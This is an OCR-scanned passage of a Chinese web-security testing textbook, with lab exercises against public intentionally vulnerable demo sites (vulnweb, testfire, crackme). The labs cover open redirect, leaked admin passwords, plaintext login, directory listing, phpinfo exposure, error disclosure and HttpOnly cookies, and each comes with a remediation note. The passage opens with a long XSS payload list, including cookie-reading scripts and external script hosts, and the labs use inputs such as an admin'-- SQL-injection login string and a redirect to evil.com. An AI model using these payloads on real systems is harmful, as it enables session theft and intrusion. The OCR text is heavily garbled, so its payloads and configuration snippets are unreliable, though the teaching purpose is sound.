>"'>< script» alert('XSS')«/script» 

< table background = 'javascript. :alert(([code]) '></table > 

< object type = text/html data = 'javascript. :alert(([code]); '></object > 
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" +alert('XSS') +" 
'>< script > alert(document. cookie)</script > 

= '>< script > alert(document. cookie)«/script» 

< script > alert(document. cookie)</script > 

< script > alert(vulnerable)</script > 

< s&#99;ript>alert('XSS')</script> 

< img src = "javas&# 99; ript:alert('XSS')"» 

% 3c/a % 3e % 3cscript % 3ealert( % 22xss % 22) % 3c/script % 3e 

% 3cscript % 3ealert( % 22xss % 22) % 3c/script % 3e/index. html 

a. jsp/« script > alert ( 'Vulnerable')</script > 

< IMG src = "/javascript. :alert"('XSS')> 

< IMG src = " /JaVaScRiPt. :alert" ('XSS')> 

< IMG src = "/JaVaScRiPt. :alert"(&quot;XSS&quot; )> 

< IMG SRC = " jav& # x09; ascript. :alert('XSS');"> 

< IMG SRC = " jav& # x0A;ascript. :alert( 'XSS') ; "> 

< IMG SRC = "jav&# x0D;ascript. :alert('XSS');"> 

"< IMG src = "/java"\0script. :alert(\"XSS\")>";'> out 

< IMG SRC=" javascript. :alert('XSS');"> //javascript 前 面 多 个 空格 ,SRC K 5 
< SCRIPT» a = /XSS/alert(a. source)</SCRIPT > 

< BODY BACKGROUND = "javascript. :alert('XSS')"» 

< BODY ONLOAD = alert('XSS')» 

< IMG DYNSRC = "javascript. :alert('XSS')"» 

< IMG LOWSRC = "javascript. :alert('XSS')"» 

< BGSOUND SRC = "javascript. :alert('XSS');"» 

<br size = "&(alert('XSS'))"» 

< LAYER SRC = "http: //xss. ha. ckers. org/a. js"></layer > 

< LINK REL = "stylesheet"HREF = "javascript. :alert('XSS');"» 

< IMG SRC = 'vbscript. :nsgbox("XSS") '> 

«META. HTTP — EQUIV = "refresh"CONTENT = "0;url = javascript. :alert('XSS') ; "> 
< IFRAME. src= "/ javascript. :alert"('XSS')» «/IFRAME» 

< FRAMESET >< FRAME. src= "/javascript. :alert"('XSS')» «/FRAME » «/FRAMESET > 
< TABLE BACKGROUND = "javascript. :alert('XSS')"» 

< DIV STYLE = "background - image: url( javascript. :alert('XSS'))"» 

< DIV STYLE = "behaviour: url( http://www. how — to- hack. org/exploit. html&# 39;);"» 
<DIV STYLE = "width: expression(alert('XSS'));"» 

< STYLE >@ inVport A jaVvascVript:alert("XSS" ) '; ^/STYLE > 

< IMG STYLE = 'xss: expreVssion(alert("XSS")) '» 

< STYLE. TYPE = "text/javascript"» alert('XSS') ; c/STYLE > 

< BASE HREF = "javascript. :alert('XSS'); //"» 

< XML SRC = "javascript. :alert('XSS');"» 


1.12 实验 # 12: testaspnet 网 站 有 未 经 认证 的 跳 转 


缺陷 标题 ”国外 网 站 testaspnet 存在 URL 重 定向 钓鱼 的 风险 。 
测试 平台 与 浏览 器 Windows 7 十 Chrome 或 Firefox. 
测试 步骤 

(1) 打开 testaspnet 网 站 http://testasp. vulnweb. com, 单 击 login 链接 。 
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(2) 观察 登录 页 面 浏览 器 地 址 栏 的 URL 地 址 ,里面 有 一 个 RetURL, 如 图 1-23 所 示 。 











B- o x 
D acuforum login x \ [ view-sourcetestaspwvuln x 
€ Œ © Not secure | testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F * v 
HP Apps 党 百度 一 下 Imported From IE Ëy Google ii% 网 Join Service API Defi 图 imi » 
































Copyright 2005 Acunetix Ltd. 








图 1-23 登录 页 面 有 成 功 后 的 RetURL 


(3) 算 改 RetURL 为 http://testasp. vulnweb. com/Login. asp? RetURL = http: 
//www. baidu. com, 并 运行 算 改 后 的 URL. 

(4) 在 登录 页 面 的 Username 文本 框 中 输入 admin'--, 在 Password 文本 框 中 输入 密 
码 , 然 后 单 击 Login 按钮 ,如 图 1-24 所 示 。 
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Username: Bdmin’ — | 
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1-24 X? RetURL 


HAAR 即使 登录 成 功 ,也 不 能 跳 转 到 百度 网 站 。 
实际 结果 ”正常 登录 ,并 自动 跳 转 到 百度 网 站 。 


S taan 
1. URL 重 定向 / 跳 转 漏洞 相关 背景 介绍 


由 于 应 用 越 来 越 多 地 需要 和 其 他 第 三 方 应 用 交互 ,以 及 在 自身 应 用 内 部 根据 不 同 的 逻 
辑 将 用 户 引 向 不 同 的 页 面 ,如 一 个 典型 的 登录 接口 就 经 常 需要 在 认证 成 功 之 后 将 用 户 引导 
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到 登录 之 前 的 页 面 ,整个 过 程 中 如 果实 现 不 好 就 可 能 导致 一 些 安全 问题 ,特定 条 件 下 可 能 引 
起 严重 的 安全 漏洞 。 

对 于 URL 跳 转 ,一 般 有 以 下 几 种 实现 方式 。 

(1) Meta 标签 内 跳 转 。 

(2) JavaScript 跳 转 。 

(3) http 头 跳 转 。 

通过 以 GET 或 者 POST 的 方式 接收 将 要 跳 转 的 URL, 然 后 通过 上 述 几 种 实现 方式 中 
的 一 种 跳 转 到 目标 URL。 一 方面 ,由 于 用 户 的 输入 会 进入 Meta, JavaScript, http 头 , 所 以 
都 可 能 发 生 相应 上 下 文 的 漏洞 ,如 XSS 等 ; 另 一 方面 URL 跳 转 功能 本 身 就 存在 一 个 缺陷 ， 
因为 会 将 用 户 浏览 器 从 可 信 的 站 点 导向 到 不 可 信 的 站 点 ,如 果 跳 转 时 带 有 敏感 数据 ,一 样 可 
能 将 敏感 数据 泄露 给 不 可 信 的 第 三 方 。 

如 果 URL 中 jumpto 没有 任何 限制 , 则 恶意 用 户 可 以 提交 http://www. XXX. org/ 
login. php? jumpto 二 http://www. evil. com 来 生成 自己 的 恶意 链接 ,安全 意识 较 低 的 用 户 
很 可 能 会 以 为 该 链接 展现 的 内 容 是 www. XXX. org, 从 而 可 能 产生 欺诈 行为 。 由 于 QQ 、 阿 
里 旺旺 等 在 线 IM 都 是 基于 URL 的 过 滤 , 对 一 些 站 点 会 以 白 名 单方 式 放 过 ,所 以 导致 恶意 
URL 可 以 在 IM 里 传播 ,从 而 产生 危害 。 例 如 ,这 里 如 果 IM 认为 www. XXX. org 都 是 可 
信 的 ,那么 通过 在 IM 里 单 击 上 述 链 接 将 导致 用 户 最 终 访问 evil. com 恶意 网 站 。 

2. 攻击 方式 及 危害 

恶意 用 户 可 以 借用 URL 跳 转 漏洞 来 欺骗 安全 意识 低 的 用 户 ,从 而 导致 "中奖 ?之 类 的 
欺诈 ,这 对 于 一 些 有 在 线 业务 的 企业 (如 淘宝 等 ) 危 害 较 大 。 借 助 URL 跳 转 ,也 可 以 突破 常 
见 的 基于 “ 白 名 单方 式 ” 的 一 些 安全 限制 。 例 如 ,传统 IM 里 对 于 URL 的 传播 会 进行 安全 校 
验 , 但 是 对 于 大 公司 的 域名 及 URL 将 直接 允许 通过 并 且 显 示 为 可 信 的 URL, 而 一 旦 该 
URL 里 包含 一 些 跳 转 漏洞 将 可 能 导致 安全 限制 被 绕 过 。 

如 果 引 用 一 些 资源 的 限制 是 依赖 于 白 名 单方 式 ,同样 可 能 被 绕 过 导致 安全 风险 。 例 如 ， 
常见 的 一 些 应 用 允许 引入 可 信 站 点 (如 youku. com) 的 视频 ,限制 方式 往往 是 检查 URL 是 
否 是 youku. com 来 实现 ,如 果 youku. com 内 含 一 个 URL 跳 转 漏洞 ,将 导致 最 终 引 入 的 资 
源 属于 不 可 信 的 第 三 方 资源 或 者 恶意 站 点 ,最 终 导 致 安全 问题 。 

所 有 带 有 URL 跳 转 的 都 可 以 尝试 自 改 至 其 他 网 站 。 常 见 可 以 得 改 的 URL 有 
returnUrl, backurl , forwardurl, redirect URL RetURL、BU、postbackurl、successURL 等 。 


1.13 SUS X13; testfire 网 站 能 获得 admin 密码 


缺陷 标题 testfire 网 站 admin 登录 密码 泄露 导致 任何 人 都 可 访问 管理 员 页 面 。 
测试 平台 与 浏览 器 Windows 7 (64 bit) 十 IE 11 或 Chrome, 
测试 步骤 
(1) 打开 testfire 网 站 http://demo. testfire. net/admin/login. aspx。 
(2) 右 击 ,选择 “查看 网 页 源 代码 ”命令 ,显示 网 页 源 代码 ,如 图 1-25 所 示 。 
期 望 结果 ”网 页 源 代码 中 不 会 泄露 敏感 信息 。 
实际 结果 ”网 页 源码 中 包括 admin 密码 ,并 且 用 这 个 密码 可 以 登录 ,如 图 1-26 所 示 。 
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图 1-25 Chrome 从 网 页 源 代码 中 找到 admin 密码 
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1-26 用 admin 密码 登录 页 面 
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专家 点 评 


2017 年 Web 十 大 安全 中 敏感 信息 泄露 已 经 排 在 第 三 名 。 程 序 员 无 意 的 信息 泄露 可 能 
会 给 网 站 带 来 致命 的 伤害 。 本 例 所 列举 的 是 HTML 注释 导致 的 安全 泄露 ,当然 JavaScript 
注释 .log 日志、 调试 信息 等 都 可 能 导致 敏感 信息 泄露 。 

美国 CSI/FBI 的 调查 显示 ,80% 的 安全 威胁 来 自 企 业内 部 ,将 近 60% 的 离职 者 在 离开 
时 会 携带 企业 数据 。Ponemon 研究 所 (Ponemon Institute) 进 行 的 一 项 调查 研究 显示 ,内 部 
泄密 已 经 成 为 企业 数据 外 泄 的 头号 原因 ,而 黑客 仅 位 列 第 五 。 

1. 内 部 人 员 无 意 泄密 和 恶意 泄密 

企业 内 部 人 员 在 上 网 时 不 小 心中 了 病毒 或 木马 ,计算 机 中 存储 的 重要 资料 由 此 流失 的 
情况 非常 多 。 病 毒 和 木马 泛滥 ,使 得 企业 泄密 的 风险 越 来 越 大 。 而 个 别 不 良 员工 明知 是 企 
业 机 密 信息 ,还 通过 QQ、MSN、 邮 件 、 博 客 或 者 是 其 他 网 络 形式 把 信息 发 到 企业 外 部 ,这 种 
有 针对 性 的 泄密 行为 导致 的 危害 也 相当 严重 。 

2. 内 部 人 员 离 职 带 走 复制 资料 泄密 

这 类 情况 发 生 概 率 最 高 。 在 离职 的 时 候 , 有 些 研 发 人 员 会 带 走 研发 成 果 , 有 些 销售 人 员 
会 带 走 企业 客户 资料 ,甚至 有 些 财务 人 员 会 把 企业 的 核心 财务 信息 复制 带 走 。 

3. 内 部 文档 权限 失控 失 密 

在 单位 内 部 ,往往 机 密 信息 会 分 为 秘密 、 机 密 和 绝密 等 不 同 的 涉 密 等 级 。 一 般 来 说 , 根 
据 人 员 在 单位 中 的 地 位 和 部 门 的 不 同 , 其 所 接触 和 知悉 的 信息 也 不 同 。 然 而 ,当前 多 数 单位 
的 涉 密 信息 的 权限 划分 是 相当 粗放 的 ,导致 不 具备 相应 密级 的 人 员 获 知 了 高 密级 信息 。 

4. 存储 设备 丢失 和 维修 失 密 

移动 存储 设备 (例如 笔记 本 电脑 ,移动 硬盘 、 手 机 存储 卡 、 数 码 照 相 / 摄 录 机 等 ) 一 旦 遗 
失 、 维 修 或 者 报废 ,其 存储 的 数据 往往 暴露 无 遗 。 随 着 移动 存储 设备 的 广泛 使 用 ,家 庭 办 公 
兴起 ,出 差 人 员 的 大 量 事务 处 理 等 都 会 不 可 避免 地 使 用 移动 存储 设备 。 因 此 ,移动 存储 设备 
丢失 和 维修 导致 泄密 也 是 当前 泄密 事件 发 生 的 主要 原因 之 一 。 

5. 对 外 信息 发 布 失控 失 密 

在 两 个 或 者 多 个 合作 单位 之 间 , 由 于 信息 交互 的 频繁 发 生 , 涉 密 信息 也 可 能 泄露 ,导致 
合作 方 不 具备 权限 的 人 员 获 得 涉 密 信息 ,甚至 是 涉 密 信息 流 至 处 于 竞争 关系 的 第 三 方 。 因 
此 ,对 于 往外 部 发 送 的 涉 密 信 息 必 须 加 以 管控 ,防止 外 发 信息 失控 而 导致 失 密 。 

6. 外 部 竞争 对 手 窍 密 

竞争 对 手 采 用 收买 方式 ,买通 企业 内 部 人 员 , 让 内 部 人 员 把 重要 信息 发 送 竞争 方 ,从 而 
窃取 机 密 的 情况 也 非常 多 。 这 种 方式 直接 损害 了 企业 的 核心 资产 ,给 企业 带 来 致命 的 打击 。 

7. 黑客 和 间谍 窃 密 

许多 黑客 和 间谍 通过 层出不穷 的 技术 手段 窃取 各 种 重要 信息 ,已 经 成 为 信息 安全 的 巨 
大 威胁 。 


1.14 实验 #14: testphp 网 站 密码 未 加 密 传输 


缺陷 标题 testphp 网 站 登录 时 密码 未 加 密 传输 。 
测试 平台 与 浏览 器 Windows 10 十 IE 11 或 Chrome 45.0。 





实验 1 软件 安全 测试 训练 
测试 步骤 

(1) 打开 testphp 网 站 http://testphp. vulnweb. com/. 

(2) 单 击 Signup 链接 。 

(3) fE Username 和 Password 文本 框 中 分 别 输入 test. 

(4) Fk F12 功能 键 ,打开 浏览 器 开发 者 工具 ,选择 Network 网 络 项 ,如 图 1-27 所 示 。 








isi losin page xW 


€ > Q [testphp.vulnweb.com/login.php 


Nacunetix ETERNI 


home | categories | artists | disclaimer | your cart | guestbook | AJAX Demo 



























































search art If you are already registered please enter your login information below: 
go 

Browse categories Usmame: jet | 

Browse artists Password: [esee 

Your cart. 

Signup —— 

Your profile You can also signup here. 

Our guestbook Signup disabled. Please use the username test and the password test. 








Q D | Elements [neon] sources Timeline Profiles Resources Audits Console 
@ Ó my vei No throttling ` 
Filter E Hide data URLs ff) | xHR Js Css img Media Font Doc WS Other 





Ø Preserve log E Disable cache 


50ms  100ms 150ms 200ms 250ms 300ms 350ms 400ms 450ms 500ms  550ms 60 











Name Status Type Initiator Time T 





图 1-27 打开 开发 者 工具 


(5) 单 击 login 按钮 。 
(6) 查看 开发 者 工具 中 的 密码 加 密 情 况 。 
期 望 结果 ”应 该 使 用 HTTPS 安全 传输 用 户 名 与 密码 。 
实际 结果 ”使 用 HTTP 连接 传输 ,密码 未 加 密 , 如 图 1-28 所 示 。 


woe OO 


超 文本 传输 协议 (HTTP) 被 用 于 在 Web 浏览 器 和 网 站 服务 器 之 间 传 递 信息 。HTTP 
以 明文 方式 发 送 内 容 , 不 提供 任何 方式 的 数据 加 密 , 如 果 攻 击 者 截取 了 Web 浏览 器 和 网 站 
服务 器 之 间 的 传输 报 文 ,就 可 以 直接 读 懂 其 中 的 信息 ,因此 ,HTTP 不 适合 传输 敏感 信息 ， 
如 信用 卡号 、 密 码 等 支付 信息 。 

为 了 解决 HTTP 的 这 一 缺陷 ,需要 使 用 另 一 种 协议 : 安全 套 接 字 层 超 文本 传输 协议 
(HTTPS)。 为 了 数据 传输 的 安全 , HTTPS 在 HTTP 的 基础 上 加 入 了 SSL 协议 。SSL H 
议 依靠 证 书 来 验证 服务 器 的 身份 ,并 为 浏览 器 和 服务 器 之 间 的 通信 加 密 。 

HTTPS 的 主要 作用 可 以 分 为 两 种 : 一 种 是 建立 一 个 信息 安全 通道 ,来 保证 数据 传输 的 
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J E] user info 









x \ 








€ > Q D testphp.vulnweb.com/userinfo.php 









search art 


Nacunetix ERTEHI 


home | categories | artists | disclaimer | your cart | guestbook | AJAX Demo Logout test 

















go 















Your cart 
Signup 
Your profile 


AJAX Demo 


Links 
Security art 


Browse categories 
Browse artists 


Our guestbook 


John Smith (test) 


On this page you can visualize or edit you user information. 





Bohn Smith 








1234-5678-2300-9000 





EnsGewinm — — | 











369258 












Preserve log E) Disable cache | No throttling ` 
Hide data URLs 图 xHR s CSS img Media Font Doc WS Other 


200ms 250ms 300ms 350ms 400ms 450ms ”500ms — 550ms 





Name 

L] userinfophp 
B stylecss 

H logo.gif 

口 addswf 





|4 requests | 24 KB transferred | Finish: 686 ms | DOMContentLoaded: 666 ms | Load: ... 





登录 成 功 , 密码 未 加 密 


X Headers Preview Response Cookie 







Origin: http: //testphp.vulnweb.d 
Referer: http://testphp.vulnweb.| 

| Upgrade-Insecure Requests: 1 
User-Agent: Hozi112/5.0 (Window 

7.36 

YForm Data — viewsoure view U 

uname: test 

x test 











图 1-28 用 的 是 HTTP 明码 传输 


安全 ; 另 一 种 是 确认 网 站 的 真实 性 。 
HTTPS 和 HTTP 的 区 别 主 要 如 下 。 
(D HTTPS 需要 到 CA 申请 证 书 。 


(2) HTTP 是 超 文 本 传输 协议 ,信息 是 明文 传输 ,HTTPS 则 是 具有 安全 性 的 SSL 加 密 


传输 协议 。 


(3) HTTP 和 HTTPS 使 用 的 是 完全 不 同 的 连接 方式 ,用 的 端口 也 不 一 样 , 前 者 是 80， 


后 者 是 443, 


(4) HTTP 的 连接 很 简单 ,是 无 状态 的 ; HTTPS 是 由 SSL 十 HTTP 构建 的 可 进行 加 


密 传输 、 身 份 认证 的 网 络 协议 , 比 HTTP 安全 。 


1.15 XIR X15; crackme 网 站 存在 源 代码 泄露 问题 


缺陷 标题 crackme 网 站 存在 暴露 目录 列表 、 源 代码 可 自由 下 载 问题 。 
测试 平台 与 浏览 器 ”Windows 7 十 Firefox 或 Chrome。 
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测试 步骤 
(1) 打开 crackme 网 站 http://crackme. cenzic. comy 。 
(2) 单 击 左边 导航 条 中 的 Not a Member 链接 ,进入 注册 页 面 , URL 为 http; 
/ / crackme. cenzic. com/kelev/register/register. php. 
(3) 删除 register. php ,直接 访问 URL http: //crackme. cenzic. com/kelev/register/ 。 
(4) 观察 页 面 元 素 。 
期 望 结果 不 显示 目录 列表 信息 。 
实际 结果 ”显示 目录 列表 信息 ,并 且 register. php 源 代码 可 以 下 载 ,如 图 1-29 所 示 。 





(€; i) | crackme cenzic.com/kelev/register/ vi 








Index of /kelev/register 





Apache/2.2.15 (CentOS) Server at crackme.cenzic.com Port 80 








图 1-29 register. php 源 代码 可 以 下 载 


x 专家 点 评 


Apache 默认 如 果 在 当前 目录 下 没有 index. html 入 口 就 会 显示 网 站 根 目 录 , 让 网 站 目 
录 文 件 暴露 在 外 面 ,这 是 一 件 非常 危险 的 事 。 例 如 ,可 能 导致 数据 库 密码 泄露 ,隐藏 页 面 暴 
露 、 网 站 所 有 源码 能 被 下 载 等 严重 安全 问题 。 

通过 以 下 操作 ,可 以 禁止 显示 Apache 网 站 根 目录 。 

进入 Apache 的 配置 文件 httpd. conf ,找到 以 下 语句 





vim /etc/httpd/conf/httpd. conf 
Options Indexes FollowSymLinks 


将 其 修改 为 以 下 语句 
Options FollowSynLinks 
修改 后 结果 如 下 。 


< Directory "/var/www/html"» 
# Options None 
# Options Indexes FollowSymLinks 
Options FollowSymLinks 
AllowOverride All 
Order allow, deny 
Allow from all 
</Directory> 


NA 
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NA 


其 实 就 是 将 Indexes 去 掉 。Indexes 表示 车 当前 目录 下 没有 index. html 则 会 显示 目录 
结构 。 

重启 Apache 服务 器 ,/etc/init. d/httpd restart 更 改 生效 。 

建议 默认 情况 下 ,设置 Apache 禁止 用 户 浏览 目录 内 容 。 


1.16 U 16: testphp 网 站 数据 库 结 构 潭 露 


缺陷 标题 testphp 网 站 管理 员 目录 列表 暴露 ,导致 数据 库 结构 泄 露 。 
测试 平台 与 浏览 器 Windows 10 十 IE 11 或 Chrome 45.0, 
测试 步骤 

(1) 打开 testphp 网 站 http://testphp. vulnweb. com/ 。 

(2) 在 浏览 器 地 址 栏 中 追加 admin, 如 图 1-30 所 示 , 按 Enter fit. 





[A] Home of Acunetix Art x V 


€ > G D testphpvuinweb.com/;dmin| _ 
macunetix ES — 


home | categories | artists | disclaimer | your cart | guestbook | AJAX Demo Logout test 





追加 admin 


search art welcome to our page 




















Test site for Acunetix WVS. 





Browse categories. 





图 1-30 在 URL 后 面 追加 admin 


HAAR “不 会 出 现 目录 结构 遍历 和 信息 泄露 问题 。 
实际 结果 ”出 现 管理 员 目 录 列 表 , 打 开 creat. sql 能 看 到 数据 库 结构 ,结果 如 图 1-31 和 
图 1-32 所 示 。 





[eh] Index of /admin/ x V 
€ > Ç D testphp.vulnweb.com/admin/ 


Index of /admin/ 




















eL 
create, sal 11-May-2011 10:27 523 








131 可 以 看 到 管理 员 目录 列表 


D 专家 点 评 


除了 本 试验 中 的 方法 ,Apache 服务 器 也 可 以 通过 配置 来 禁止 访问 某 些 文件 /目录 。 
(1) 增加 Files 选项 来 控制 。 例 如 ,不 允许 访问 .inc 扩展 名 的 文件 ,保护 PHP 类 库 。 
可 通过 以 下 语句 实现 。 


«Files — ". inc $ "> 
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INTEGER(32) 上 






QREATE TABLE IF NOT EXISTS artists( 
artist id INTEGER(5) PRIMARY KEY AUTO INCREMENT, 
aname CHAR(50), 
adesc BLOB) ; 


QREATE TABLE IF NOT EXISTS categ( 暴露 网 站 数据 库 
cat_id INTEGER(5) PRIMARY KEY AUTO INCJEMENT, 
crame CHAR(50), 
cdesc BLOB) ; 


QREATE TABLE IF NOT EXISTS pictures( 
pic id INTEGER(5) PRIMARY KEY AUTO INCREMENT, 
pshort 
plong 








img CHAR(50)) 





图 1-32 暴露 网 站 数据 库 


Order allow,deny 
Deny from all 
«/Files» 


(2) 禁止 访问 某 些 指定 的 目录 (可 以 用 < DirectoryMatch > 来 进行 正则 匹配 ) , 


«Directory ~ "^/var/www/(. + /) * [O- 9](3]"» 
Order allow,deny 
Deny from all 

</Directory> 


(3) 通过 文件 匹配 来 禁止 ,比如 禁止 所 有 针对 图 片 的 访问 。 


« FilesMatch . (?i:gif|jpeg|png) $ > 
Order allow, deny 
Deny from all 

«/FilesMatch» 


(4) 针对 URL 相对 路 径 的 禁止 访问 。 


< Location /dir/» 
Order allow, deny 
Deny from all 

«/Location» 


1.17 实验 #17: testphp 网 站 服务 器 信息 泄露 


缺陷 标题 testphp 网 站 存在 PHP 信息 泄露 风险 。 

测试 平台 与 浏览 器 Windows 7 (64 bit) 十 IE 11 或 Chrome, 

测试 步骤 
(1) 打开 testphp 网 站 http://testphp. vulnweb. com/secured/phpinfo. php。 
(2) 分 别 在 TE Chrome 上 观察 页 面 信息 。 
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HAAR 不 显示 PHP 详细 信息 。 
实际 结果 “显示 PHP 详细 信息 ,如 图 1-33 和 图 1-34 所 示 。 

















ET 





图 1-33 Chrome 上 显示 PHP 详细 信息 























图 1-34 IE LE Ss PHP 详细 信息 
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EO 专家 点 评 


PHP 是 一 个 HTML 嵌入 式 脚本 语言 。PHP 包 是 通过 一 个 名 为 phpinfo. php 的 CGI 
程序 传输 的 。phpinfo. php 对 系统 管理 员 来 说 是 一 个 十 分 有 用 的 工具 ,在 安装 的 时 候 被 默 
认 安 装 。 但 它 也 能 被 用 来 泄露 其 所 在 服务 器 上 的 一 些 敏感 信息 。 

PHPInfo 提供 了 以 下 信息 。 

(1) PHP 版 本 (包括 build 版 本 在 内 的 精确 版 本 信息 )。 

(2) 系统 版 本 信息 (包括 build 版 本 在 内 的 精确 版 本 信息 )。 

(3) 扩展 目录 (PHP 所 在 目录 )。 

(4) SMTP 服务 器 信息 。 

(5) Sendmail 路 径 ( 如 果 安 装 了 Sendmail) 。 

(6) Posix 版 本 信息 。 

(7) 数据 库 : ODBC 设置 (包括 路 径 、 数 据 库 名 .默认 密码 等 ); MySQL 客户 端的 版 本 信 
息 (包括 build 版 本 在 内 的 精确 版 本 信息 ); Oracle 版 本 信息 和 库 的 路 径 。 

(8) 所 在 位 置 的 实际 路 径 。 

(9) Web 服务 器 。 

(10) IIS 版 本 信息 。 

(11) Apache 版 本 信息 。 

如 果 在 Windows(32bit) 环 境 下 运行 ,那么 还 会 提供 以 下 信息 。 

(1) 计算 机 名 。 

(2) Windows 目录 的 位 置 。 

(3) 路 径 ( 能 用 来 泄露 已 安装 的 软件 信息 ) 。 

通过 访问 一 个 类 似 http://www. example. com/PHP/phpinfo. php 的 URL, 即 会 得 到 
以 上 信息 。 

解决 方案 是 删除 这 个 对 外 CGI 接口 ,因为 它 主要 适用 于 调试 目的 ,不 应 放 在 实际 工作 
的 服务 器 上 。 


1.18 ”实验 #18: testfire 网 站 出 错 导 致 应 用 程序 细节 浊 露 


缺陷 标题 testfire 网 站 出 错 导致 应 用 程序 细节 泄露 。 
测试 平台 与 浏览 器 Windows 7 十 Chrome 或 Firefox。 
测试 步骤 
(1) 打开 testfire 网 站 http://demo. testfire. net。 
(2) 单 击 Online Banking with FREE Online Bill Pay 链接 ,如 图 1-35 所 示 。 
(3) 单 击 后 进入 URL http: //demo. testfire. net/default. aspx?content = personal _ 
savings. htm, 
期 望 结果 ”网 页 能 正常 访问 。 
实际 结果 ”网 页 出 错 ,透露 网 站 代码 细节 ,如 图 1-36 所 示 。 
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图 1-35 M Online Banking with FREE Online Bill Pay 链接 





500 - Internal server error. 
There is a problem with the resource you are looking for, and it cannot be displayed. 











An Error Has Occurred 
Summary: 
Could not Rind fie ‘Ci\downloads VAltoroMutual, v6 | website static personal. savingshtm 


Error Message: 


Syatem10.FileNotFound£sception: Could not find file `C. \dovmloads VltoroMutual y£lvebsitelstatictpersonal savings-him'. File name: ‘Ci\dovnioads\AltoroMutual_vé\website stati 
Svstem.10._Error. WiniOErrornt32 errorCode, Sting maybaFullPath) at System.1O,FleStrwam. Inti String path, FleMode mode, FileAccass accesa, Int32 rights, Boolean saRighes, Files 
FileOpbans options, SECURITI. ATTRIBUTES secAttrs, Sting msgpath Boolean bFromProny) at System.IO.FieStream..ctor(Sing path. FileMode mode, FileAccess access, FileShare share 
optiona) at System.1O.Streamender..ctor(Stsng path. Encoding encoding, Boolean detecttncodingfromByteOrderMark, Int32 buffertise) at System 10. StreamPeader. ctor String path) d 
path) at Altore. Default-LoadFile( String myFiie) in ciVdownloadstAltoreMutual v6lvebsiteldefault-aspx.cs [ine 42 at Altoro.Default.Page Losd(Object sender, EventArgs e) in 

er osiosds AltoroMutval v6 seite afa aspe. ce hne 70 at System. Web. Ub. Callelpsr EvertArgFunctonCalle intptr fp, Object o, Object t. EventArgs e) at 
DAE 
System. Web. UL Page, ProcessPequestitain(Boclean includeStagesbeforeksync?sint, Boclean inchudeStagesAfterksyncPoirt) 
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图 1-36 ”透露 网 站 代码 细节 


多 多 专家 点 评 


出 错 网 页 泄露 网 站 代码 细节 ,为 安全 攻击 者 提供 了 便利 。 程 序 发 布 到 服务 器 供用 户 使 
用 前 ,一 定 要 屏 项 掉 所 有 的 调试 页 ,给 用 户 一 个 相对 统一 的 出 错 页 ,不 暴露 代码 细节 。 
web. config 中 的 < customErrors > 节点 用 于 定义 一 些 自 定 义 错误 信息 。 此 节点 有 
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Mode 和 defaultRedirect 两 个 属性 ,其 中 defaultRedirect 属性 表示 应 用 程序 发 生 错 误 时 重 
定向 到 的 默认 URL, Mode 属性 有 On, Off, RemoteOnly 3 个 值 。 
customErrors 节点 在 web. config 中 的 位 置 为 configuration>system. web—customerErrors, 
customErrors 节点 常见 用 法 如 下 。 


< configuration» 
< system. web > 
< custonErrors defaultRedirect = "defaultErrorURL" mode = "RemoteOnly"» 
< error statusCode = "500" redirect = "500ErrorURL" /> 
< error statusCode = "403" redirect = "403URL" /> 
< error statusCode = "404" redirect = "404URL" /> 
«/customErrors > 
«/systen. web» 
«/configuration^ 


这 样 就 可 以 统一 定义 网 页 出 现 500、403、404 等 错误 时 跳 转 到 哪个 指定 页 面 。 


1.19 ”实验 #19: testfire 网 站 Cookie 没 设置 成 HttpOnly 


缺陷 标题 testfire 网 站 部 分 Cookie 没有 设置 成 HttpOnly, 
测试 平台 与 浏览 器 ”Windows 7 十 Chrome 或 Firefox. 
测试 步骤 
(1) 打开 testfire 网 站 http://demo. testfire. net, 
(2) 用 ZAP 工具 查看 网 站 Cookie 设置 ( 按 F12 功能 键 , 进 入 开发 者 模式 ,也 能 看 到 
Cookie 设置 ) 。 
期 望 结果 所 有 Cookie 正确 设置 。 
实际 结果 ”部 分 Cookie 没有 设置 成 HttpOnly. WE 1-37 所 示 。 
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图 1-37 部 分 Cookie 没有 设置 成 HttpOnly 
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HTTP response header 中 对 于 Cookie 的 设置 如 下 。 





Set - Cookie:« name» = < value»[;« Max — Age > = < age >] [ ;expires = < date >] [ ; domain = < domain_ 

name >] = [;path- < some path»][;secure][ ;HttpOnly] 

— Cookie 包含 以 下 信息 。 

(1) Cookie 名 称 。Cookie 名 称 必须 使 用 只 能 用 在 URL 中 的 字符 ,一 般 为 字母 及 数字 ， 
不 能 包含 特殊 字符 ,如 有 特殊 字符 则 需要 转 码 。 例 如 ,JavaScript 操作 Cookie 时 可 以 使 用 
escape() 对 名 称 进 行 转 码 。 

(2) Cookie 值 。Cookie 值 与 Cookie 名 称 类 似 , 可 以 进行 转 码 和 加 密 。 

(3) Expires, 即 过 期 日 期 ,这 是 一 个 GMT 格式 的 时 间 , 当 过 了 这 个 日 期 之 后 ,浏览 器 会 
将 这 个 Cookie 删除 ; 如 果 不 设置 Expires, 则 Cookie 在 浏览 器 关闭 后 消失 。 

(4) Path, 这 是 一 个 路 径 , 在 这 个 路 径 下 面 的 页 面 才 可 以 访问 该 Cookie, 一 般 设 为 /, 以 
表示 同一 个 站 点 的 所 有 页 面 都 可 以 访问 这 个 Cookie。 

(5) Domain, PP + 3&, 指定 在 该 子 域 下 才 可 以 访问 Cookie。 例 如 ,要 让 Cookie 在 
a. test, com 下 可 以 访问 ,但 在 b. test. com 下 不 能 访问 , 则 将 domain 设置 成 a. test. com, 

(6) Secure。 即 安全 性 ,指定 Cookie 是 否 只 能 通过 HTTPS 协议 访问 。 一 般 的 Cookie 
使 用 HTTP 协议 即 可 访问 ; 如 果 设 置 了 Secure( 没 有 值 ) , 则 只 有 使 用 HTTPS 协议 才 可 以 
访问 。 

(7) HttpOnly。 如 果 在 Cookie 中 设置 了 HttpOnly 属性 ,那么 通过 程序 (JavaScript fg 
A Applet 等 ) 将 无 法 读 取 到 Cookie 信息 。 

一 般 为 加 固 Cookie. 都 需要 设置 HttpOnly 与 Secure 属性 ,并 且 给 Cookie 一 个 失效 
时 间 。 


1.20 实验 上 # 20: testasp 网 站 密码 能 自动 保存 在 浏览 器 中 


缺陷 标题 testasp 网 站 密码 能 自动 保存 在 浏览 器 中 。 
测试 平台 与 浏览 器 ”Windows 7 十 Chrome 或 Firefox。 
测试 步骤 
(1) 打开 testasp 网 站 http://testasp. vulnweb. com/。 
(2) 按 F12 功能 键 ,打开 开发 者 模式 ,尝试 登录 网 站 。 
